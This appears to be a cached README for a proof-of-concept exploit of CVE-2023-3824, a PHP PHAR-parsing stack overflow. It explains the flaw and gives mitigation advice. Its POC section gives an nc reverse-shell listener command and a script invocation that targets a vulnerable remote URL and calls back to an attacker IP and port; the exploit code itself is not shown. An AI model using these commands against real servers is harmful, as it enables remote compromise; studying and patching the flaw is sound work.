In PHP version 8.0.* before 8.0.30, 8.1.* before 8.1.22, and 8.2.* before 8.2.8, when loading phar file, while reading PHAR directory entries, insufficient length checking may lead to a stack buffer overflow, leading potentially to memory corruption or RCE. # About
CVE-2023-3824 is a critical **remote code execution (RCE)** vulnerability in PHP, affecting versions 8.0.x (before 8.0.30), 8.1.x (before 8.1.22), and 8.2.x (before 8.2.8). The vulnerability arises from **insufficient length checking** when processing PHAR files (PHP's archive format), specifically when reading PHAR directory entries in the `Phar::loadPhar()` function.
## Exploitation Overview
- **Stack Buffer Overflow**: The vulnerability stems from improper bounds checking, which can lead to a **stack buffer overflow**. If an attacker crafts a malicious PHAR file with overly long filenames or directory entries, they can trigger this overflow.
- **Memory Corruption**: This overflow can cause memory corruption, which in turn may allow an attacker to execute arbitrary code on the server hosting the vulnerable PHP version.
- **Remote Code Execution**: Successful exploitation could grant the attacker the ability to execute arbitrary code remotely, effectively compromising the entire system.
## Exploit Example
The attack typically involves submitting a maliciously crafted PHAR file to a vulnerable PHP application. If the application processes untrusted PHAR files (e.g., through file uploads), an attacker could exploit this to run arbitrary code on the server.
A proof-of-concept (PoC) for this vulnerability shows how a carefully crafted PHAR file can trigger the overflow. While exploiting this vulnerability requires specific conditions (such as an application using PHAR files), the potential for RCE makes it a severe issue, especially for PHP-based web applications.
## Mitigation
- **Update PHP**: The primary fix is to update PHP to versions 8.0.30, 8.1.22, or 8.2.8, which include patches to address the vulnerability.
- **Avoid Untrusted PHAR Files**: As a general security measure, ensure your application avoids processing untrusted PHAR files.
This vulnerability has a high severity rating (CVSS 9.4) due to the potential for full system compromise. Keeping PHP updated is crucial to mitigate this risk.
# POC
Run reverse shell listener:
```bash
nc -l local_port
```
Then run POC:
```bash
bash cve-2023-3824.sh remote_url local_ip local_port
```
* _remote_url_ is vulnerable remote php script, e.g. `https://wp.example.com/form-uploader.php`
* _local_ip_ is an attacker machine IP
* _local_port_ is an attacker machine port
If the exploit succeeds, you'll get the shell with the server's (apache, nginx) permissions.
---
---
```text
.--,-``-.
,---, / / '.
,---, ,--.' | / ../ ;
,---.'| | | : \ ``\ .`- ' __ ,-.
| | : .--.--. : : : \___\/ \ :,' ,'/ /|
: : : ,--.--. ,---. / / ' : | |,--. \ : |' | |' |
: |,-. / \ / \ | : /`./ | : ' | / / / | | ,'
| : ' | .--. .-. | / / || : ;_ | | /' : \ \ \ ' : /
| | / : \__\/: . .. ' / | \ \ `.' : | | | ___ / : || | '
' : |: | ," .--.; |' ; /| `----. \ | ' | : / /\ / :; : |
| | '/ : / / ,. |' | / | / /`--' / : :_:,'/ ,,/ ',- .| , ;
| : |; : .' \ : |'--'. /| | ,' \ ''\ ; ---'
/ \ / | , .-./\ \ / `--'---' `--'' \ \ .'
`-'----' `--`---' `----' `--`-,,-'
```
---
inspired by ::PerfectForms::Log in to view the POC file snapshot cached by Shenlong Bot
Log in to view